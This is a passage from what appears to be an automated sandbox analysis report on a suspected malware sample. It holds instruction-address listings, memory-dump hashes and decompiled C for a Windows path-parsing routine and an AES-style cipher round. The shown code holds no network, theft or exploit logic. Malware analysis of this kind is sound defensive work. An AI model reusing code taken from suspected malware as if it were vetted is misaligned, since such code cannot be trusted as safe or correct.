                            0x0041dbc6
                            0x0041dbcd
                            0x0041dbce
                            0x0041dbd4
                            0x0041dbe0
                            0x0041dbe6
                            0x0041dbef
                            0x0041dbfb
                            0x0041dbfc
                            0x0041dc03
                            0x0041dc08
                            0x0041dc0f
                            0x0041dc16
                            0x0041dc1c
                            0x0041dc22
                            0x0041dc28
                            0x0041dc2e
                            0x0041dc34
                            0x0041dc3b
                            0x0041dc41
                            0x0041dc42
                            0x0041dc48
                            0x0041dc4b
                            0x0041dc4b
                            0x0041dc4b
                            0x0041dc51
                            0x0041dc57
                            0x0041dc63
                            0x0041dc69
                            0x0041dc6f
                            0x0041dc75
                            0x0041dc7c
                            0x0041dc83
                            0x0041dc8f
                            0x0041dc95
                            0x0041dca1
                            0x0041dca7
                            0x0041dca8
                            0x0041dcaf
                            0x0041dcb6
                            0x0041dcbc
                            0x0041dcbc
                            0x0041dcbc
                            0x0041dcc2
                            0x0041dcc8
                            0x0041dccb
                            0x0041dccc
                            0x0041dcdc
                            0x0041dcdc
                            0x0041dcdc
                            0x0041dce2
                            0x0041dce8
                            0x0041dcef
                            0x0041dcf6
                            0x0041dcfd
                            0x0041dcfe
                            0x0041dd0a
                            0x0041dd10
                            0x0041dd11
                            0x0041dd17
                            0x0041dd1d
                            0x0041dd23
                            0x0041dd24
                            0x0041dd26
                            0x0041dd2c
                            0x0041dd32
                            0x0041dd38
                            0x0041dd3b
                            0x0041dd3c
                            0x0041dd43
                            0x0041dd51
                            0x0041dd57
                            0x0041dd61
                            0x0041dd67
                            0x0041dd68
                            0x0041dd6f
                            0x0041dd75
                            0x0041dd7b
                            0x0041dd81
                            0x0041dd87
                            0x0041dd8d
                            0x0041dd94
                            0x0041dd9a
                            0x0041dda0
                            0x0041dda1
                            0x0041dda7
                            0x0041ddad
                            0x0041ddb3
                            0x0041ddb4
                            0x0041ddba
                            0x0041ddc0
                            0x0041ddc7
                            0x0041ddd3
                            0x0041ddd6
                            0x0041ddd7
                            0x0041dddd
                            0x0041dde7
                            0x0041ddee
                            0x0041ddf5
                            0x0041ddfc
                            0x0041de05
                            0x0041de0b
                            0x0041de12
                            0x0041de18
                            0x0041de18
                            0x0041de18
                            0x0041de23
                            0x0041de29
                            0x0041de2f
                            0x0041de35
                            0x0041de3b
                            0x0041de3e
                            0x0041de45
                            0x0041de69
                            0x0041de6f
                            0x0041de75
                            0x0041de81
                            0x0041de83
                            0x0041de89
                            0x0041de8f
                            0x0041de90
                            0x0041de96
                            0x0041de9c
                            0x0041dea2
                            0x0041dea3
                            0x0041deaa
                            0x0041deab
                            0x0041deb1
                            0x0041deb8
                            0x0041deb8
                            0x0041debe
                            0x0041debf
                            0x0041dec5
                            0x0041decc
                            0x0041decd
                            0x0041ded4
                            0x0041ded5
                            0x0041dedb
                            0x0041dedc
                            0x0041dedd
                            0x0041dee9
                            0x0041deef
                            0x0041def2
                            0x0041def8
                            0x0041deff
                            0x0041df05
                            0x0041df0c
                            0x0041df18
                            0x0041df1e
                            0x0041df28
                            0x0041df2e
                            0x0041df34
                            0x0041df3a
                            0x0041df44
                            0x0041df4a
                            0x0041df4b
                            0x0041df4b
                            0x0041df4b
                            0x0041df51
                            0x0041df57
                            0x0041df5d
                            0x0041df66
                            0x0041df6c
                            0x0041df72
                            0x0041df78
                            0x0041df7b
                            0x0041df82
                            0x0041df83
                            0x0041df84
                            0x0041df84
                            0x0041df84
                            0x0041df8a
                            0x0041df8f
                            0x0041df96
                            0x0041df9c
                            0x0041dfa8
                            0x0041dfaf
                            0x0041dfb6
                            0x0041dfb7
                            0x0041dfba
                            0x0041dfc0
                            0x0041dfc6
                            0x0041dfd2
                            0x0041dfd8
                            0x0041dfdb
                            0x0041dfe1
                            0x0041dfed
                            0x0041dff3
                            0x0041dff3
                            0x0041dff3
                            0x0041dff9
                            0x0041e00b
                            0x0041e012
                            0x0041e012
                            0x0041e012
                            0x0041e018
                            0x0041e01e
                            0x0041e025
                            0x0041e02b
                            0x0041e031
                            0x0041e038
                            0x0041e038
                            0x0041e03e
                            0x0041e03e
                            0x0041df34
                            0x0041dedd
                            0x0041ddd7
                            0x0041dd26
                            0x0041dbef
                            0x0041db8c
                            0x0041db62
                            0x0041d586
                            0x0041d586
                            0x0041d586
                            0x0041d586
                            0x0041d586
                            0x0041d58c
                            0x0041d58d
                            0x0041d594
                            0x0041d595
                            0x0041d59a
                            0x0041d5a0
                            0x00000000
                            0x00000000
                            0x0041d5a2
                            0x0041d5ba
                            0x0041d5c1
                            0x0041d5da
                            0x0041d5e6
                            0x0041d5ed
                            0x0041d60c
                            0x0041d613
                            0x0041d61a
                            0x0041d620
                            0x0041d630
                            0x0041d637
                            0x0041d63d
                            0x0041d643
                            0x0041d649
                            0x0041d650
                            0x0041d660
                            0x0041d666
                            0x0041d66c
                            0x0041d672
                            0x0041d679
                            0x0041d689
                            0x0041d691
                            0x0041d692
                            0x0041d693
                            0x0041d699
                            0x0041d69f
                            0x0041d586
                            0x0041d586
                            0x0041d586
                            0x0041d586
                            0x0041d586
                            0x0041d58c
                            0x0041d58d
                            0x0041d594
                            0x0041d595
                            0x0041d59a
                            0x0041d5a0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0041d586
                            0x0041d586
                            0x0041d586
                            0x0041d586
                            0x0041d586
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0041d586
                            0x00000000
                            0x0041d586
                            0x0041d774
                            0x0041d77a
                            0x0041d77b
                            0x0041d788
                            0x0041d788
                            0x0041d78f
                            0x0041d797
                            0x0041d7a9
                            0x0041d7b0
                            0x0041d7b6
                            0x0041d7b7
                            0x0041d7bd
                            0x0041d7c7
                            0x0041d7c8
                            0x0041d7ce
                            0x0041d7cf
                            0x0041d7db
                            0x0041d7dc
                            0x0041d7e3
                            0x0041d7e4
                            0x0041d7ea
                            0x0041d7f4
                            0x0041d7fa
                            0x0041d7fc
                            0x0041d7fc
                            0x0041d80e
                            0x0041d813
                            0x0041d819
                            0x0041d820
                            0x0041d825
                            0x0041d82b
                            0x0041d831
                            0x0041d837
                            0x0041d83e
                            0x0041d844
                            0x0041d84a
                            0x0041d850
                            0x0041d856
                            0x00000000
                            0x0041d85c
                            0x0041d85c
                            0x0041d863
                            0x0041d86f
                            0x0041d87c
                            0x0041d883
                            0x0041d88f
                            0x0041d892
                            0x0041d893
                            0x0041d899
                            0x0041d8a0
                            0x0041d8a0
                            0x0041d8a0
                            0x0041d8a6
                            0x0041d8b0
                            0x0041d8b1
                            0x0041d8bd
                            0x0041d8c9
                            0x0041d8cf
                            0x0041d8e2
                            0x0041d8f0
                            0x0041d8f6
                            0x0041d8fd
                            0x0041d904
                            0x0041d90a
                            0x0041d910
                            0x0041d91c
                            0x0041d92b
                            0x0041d931
                            0x0041d934
                            0x0041d93a
                            0x0041d940
                            0x0041d942
                            0x0041d948
                            0x0041d94f
                            0x0041d955
                            0x0041d962
                            0x0041d969
                            0x00000000
                            0x0041d96f
                            0x0041d975
                            0x0041d975
                            0x0041d969
                            0x0041d856
                            0x0041d586
                            0x0041d6a5
                            0x0041d6ab
                            0x0041d6b6
                            0x0041d6bc
                            0x0041d6cf
                            0x0041d6d5
                            0x0041d6da
                            0x0041d6e3
                            0x0041d6eb
                            0x0041d6f2
                            0x0041d6f8
                            0x0041d703
                            0x0041d70f
                            0x0041d715
                            0x0041d71b
                            0x0041d727
                            0x0041d72d
                            0x0041d733
                            0x0041d739
                            0x0041d739
                            0x0041d73f
                            0x0041d746
                            0x0041d754
                            0x0041d766
                            0x0041d767
                            0x0041d586
                            0x0041d586
                            0x0041d586
                            0x0041d586
                            0x0041d58c
                            0x0041d58d
                            0x0041d594
                            0x0041d595
                            0x0041d59a
                            0x0041d59a

                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fc00598d88494a2afebfaa63ba29228143dddb19cb7938cb895a7e339b1fccc9
                            • Instruction ID: 2db99dc53e1b9970f4ebd6bf4c5354e59f4c43c2f09b1f8ad9a61e95e017e241
                            • Opcode Fuzzy Hash: fc00598d88494a2afebfaa63ba29228143dddb19cb7938cb895a7e339b1fccc9
                            • Instruction Fuzzy Hash: 5D328132948795CFD706CF38D99AA853FB2F342724B08439EC9A1872D2D7342566DF89
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AD4120, Relevance: .4, Instructions: 444COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 92%
                            			E00AD4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0xbad360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E00AEF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = L00AD6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L00AD4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = L00AD6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M00AD45F8))) {
												case 0:
													_v568 = 0xa91078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0xa911c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L00AD4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															L00AFF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															L00AFF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E00AB52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																L00ACEB70(1, 0xba79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E00ACAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E00AF95D0();
																			L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return L00AFB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = L00AF3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return L00AFB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                            0x00ad4128
                            0x00ad4135
                            0x00ad413c
                            0x00ad4141
                            0x00ad4145
                            0x00ad4147
                            0x00ad414e
                            0x00ad4151
                            0x00ad4159
                            0x00ad415c
                            0x00ad4160
                            0x00ad4164
                            0x00ad4168
                            0x00ad416c
                            0x00ad417f
                            0x00ad4181
                            0x00ad446a
                            0x00ad446a
                            0x00ad418c
                            0x00ad4195
                            0x00ad4199
                            0x00ad4432
                            0x00ad4439
                            0x00ad443d
                            0x00ad4442
                            0x00ad4447
                            0x00000000
                            0x00ad419f
                            0x00ad41a3
                            0x00ad41b1
                            0x00ad41b9
                            0x00ad41bd
                            0x00ad45db
                            0x00ad45db
                            0x00000000
                            0x00ad41c3
                            0x00ad41c3
                            0x00ad41ce
                            0x00ad41d4
                            0x00b1e138
                            0x00b1e13e
                            0x00b1e169
                            0x00b1e16d
                            0x00b1e19e
                            0x00b1e16f
                            0x00b1e16f
                            0x00b1e175
                            0x00b1e179
                            0x00b1e18f
                            0x00b1e193
                            0x00000000
                            0x00b1e199
                            0x00000000
                            0x00b1e199
                            0x00b1e193
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00ad41da
                            0x00ad41da
                            0x00ad41df
                            0x00ad41e4
                            0x00ad41ec
                            0x00ad4203
                            0x00ad4207
                            0x00b1e1fd
                            0x00ad4222
                            0x00ad4226
                            0x00b1e1f3
                            0x00b1e1f3
                            0x00ad422c
                            0x00ad422c
                            0x00ad4233
                            0x00b1e1ed
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00ad4239
                            0x00ad4239
                            0x00ad4239
                            0x00ad4239
                            0x00ad4233
                            0x00ad4226
                            0x00ad41ee
                            0x00ad41ee
                            0x00ad41f4
                            0x00ad4575
                            0x00b1e1b1
                            0x00b1e1b1
                            0x00000000
                            0x00ad457b
                            0x00ad457b
                            0x00ad4582
                            0x00b1e1ab
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00ad4588
                            0x00ad4588
                            0x00ad458c
                            0x00b1e1c4
                            0x00b1e1c4
                            0x00000000
                            0x00ad4592
                            0x00ad4592
                            0x00ad4599
                            0x00b1e1be
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00ad459f
                            0x00ad459f
                            0x00ad45a3
                            0x00b1e1d7
                            0x00b1e1e4
                            0x00000000
                            0x00ad45a9
                            0x00ad45a9
                            0x00ad45b0
                            0x00b1e1d1
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00ad45b6
                            0x00ad45b6
                            0x00ad45b6
                            0x00000000
                            0x00ad45b6
                            0x00ad45b0
                            0x00ad45a3
                            0x00ad4599
                            0x00ad458c
                            0x00ad4582
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00ad41f4
                            0x00ad423e
                            0x00ad4241
                            0x00ad45c0
                            0x00ad45c4
                            0x00000000
                            0x00ad45ca
                            0x00ad45ca
                            0x00000000
                            0x00b1e207
                            0x00b1e20f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00ad45d1
                            0x00000000
                            0x00000000
                            0x00ad45ca
                            0x00000000
                            0x00ad4247
                            0x00ad4247
                            0x00ad4247
                            0x00ad4249
                            0x00ad4249
                            0x00ad4249
                            0x00ad4251
                            0x00ad4251
                            0x00ad4257
                            0x00ad425f
                            0x00ad426e
                            0x00ad4270
                            0x00ad427a
                            0x00b1e219
                            0x00b1e219
                            0x00ad4280
                            0x00ad4282
                            0x00ad4456
                            0x00ad45ea
                            0x00000000
                            0x00ad45f0
                            0x00b1e223
                            0x00000000
                            0x00b1e223
                            0x00ad445c
                            0x00ad445c
                            0x00000000
                            0x00ad445c
                            0x00000000
                            0x00ad4288
                            0x00ad428c
                            0x00b1e298
                            0x00ad4292
                            0x00ad4292
                            0x00ad429e
                            0x00ad42a3
                            0x00ad42a7
                            0x00ad42ac
                            0x00b1e22d
                            0x00ad42b2
                            0x00ad42b2
                            0x00ad42b9
                            0x00ad42bc
                            0x00ad42c2
                            0x00ad42ca
                            0x00ad42cd
                            0x00ad42cd
                            0x00ad42d4
                            0x00ad433f
                            0x00ad433f
                            0x00ad42d6
                            0x00ad42d6
                            0x00ad42d9
                            0x00ad42dd
                            0x00ad42eb
                            0x00b1e23a
                            0x00ad42f1
                            0x00ad4305
                            0x00ad430d
                            0x00ad4315
                            0x00ad4318
                            0x00ad431f
                            0x00ad4322
                            0x00ad432e
                            0x00ad433b
                            0x00ad433b
                            0x00000000
                            0x00ad432e
                            0x00ad42eb
                            0x00ad434c
                            0x00ad434e
                            0x00ad4352
                            0x00ad4359
                            0x00ad435e
                            0x00ad4361
                            0x00ad436e
                            0x00ad438a
                            0x00ad438e
                            0x00ad4396
                            0x00ad439e
                            0x00ad43a1
                            0x00ad43ad
                            0x00ad43bb
                            0x00ad43bb
                            0x00ad43ad
                            0x00ad436e
                            0x00ad43bf
                            0x00ad43c5
                            0x00ad4463
                            0x00ad4463
                            0x00ad43ce
                            0x00ad43d5
                            0x00ad43d9
                            0x00ad43df
                            0x00ad4475
                            0x00ad4479
                            0x00ad4491
                            0x00ad4491
                            0x00ad4479
                            0x00ad43e5
                            0x00ad43eb
                            0x00ad43f4
                            0x00ad43f6
                            0x00ad43f9
                            0x00ad43fc
                            0x00ad43ff
                            0x00ad44e8
                            0x00ad44ed
                            0x00ad44f3
                            0x00b1e247
                            0x00000000
                            0x00ad44f9
                            0x00ad4504
                            0x00ad4508
                            0x00ad450f
                            0x00b1e269
                            0x00000000
                            0x00ad4515
                            0x00ad4519
                            0x00ad4531
                            0x00ad4534
                            0x00ad4537
                            0x00ad453e
                            0x00ad4541
                            0x00ad454a
                            0x00b1e255
                            0x00b1e255
                            0x00b1e25b
                            0x00b1e25e
                            0x00b1e261
                            0x00b1e261
                            0x00ad4555
                            0x00ad4559
                            0x00ad455d
                            0x00b1e26d
                            0x00b1e270
                            0x00b1e274
                            0x00b1e27a
                            0x00b1e27d
                            0x00b1e28e
                            0x00b1e28e
                            0x00ad4563
                            0x00ad4563
                            0x00ad4569
                            0x00ad4569
                            0x00000000
                            0x00ad455d
                            0x00ad450f
                            0x00000000
                            0x00ad44f3
                            0x00ad43ff
                            0x00ad4405
                            0x00ad4405
                            0x00ad4405
                            0x00ad42ac
                            0x00ad428c
                            0x00ad4282
                            0x00ad4407
                            0x00ad440d
                            0x00b1e2af
                            0x00b1e2af
                            0x00ad4413
                            0x00ad4413
                            0x00000000
                            0x00ad41d4
                            0x00000000
                            0x00ad41c3
                            0x00ad41bd
                            0x00ad4415
                            0x00ad4415
                            0x00ad4416
                            0x00ad4417
                            0x00ad4429
                            0x00ad416e
                            0x00ad416e
                            0x00ad4175
                            0x00ad4498
                            0x00ad449f
                            0x00b1e12d
                            0x00000000
                            0x00b1e133
                            0x00000000
                            0x00b1e133
                            0x00ad44a5
                            0x00ad44a5
                            0x00ad44aa
                            0x00000000
                            0x00ad44bb
                            0x00ad44ca
                            0x00ad44d6
                            0x00ad44d7
                            0x00ad44d8
                            0x00ad44e3
                            0x00ad44e3
                            0x00ad44aa
                            0x00ad417b
                            0x00ad417b
                            0x00ad417b
                            0x00000000
                            0x00ad417b
                            0x00ad4175
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1600af0c6cf615a57c399ffd397b67ce76807a99a78a777c096c34e844cb758e
                            • Instruction ID: 7c9f902d5ae16ae6ac26dbcd17b85101a4041576a334df995d395608fce0b603
                            • Opcode Fuzzy Hash: 1600af0c6cf615a57c399ffd397b67ce76807a99a78a777c096c34e844cb758e
                            • Instruction Fuzzy Hash: 31F167706082118BCB24CF59C480A7AB7F1EF98714F54896EF89ACB390E734DD95DB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00402FB0, Relevance: .4, Instructions: 435COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 26%
                            			E00402FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t273;
				signed int _t274;
				signed int _t282;
				signed int* _t358;
				signed int _t383;
				signed int* _t409;
				signed int _t429;
				signed int _t458;
				signed int _t478;
				signed int _t560;
				signed int _t603;

				_t273 = __eax;
				asm("ror edi, 0x8");
				asm("rol edx, 0x8");
				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_v20 = _t458;
				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
				asm("ror esi, 0x8");
				asm("rol edx, 0x8");
				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
				asm("ror edx, 0x10");
				asm("ror esi, 0x8");
				asm("rol esi, 0x8");
				_v24 = _t282;
				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
				asm("ror esi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
				asm("ror ebx, 0x8");
				asm("ror edi, 0x10");
				asm("rol edi, 0x8");
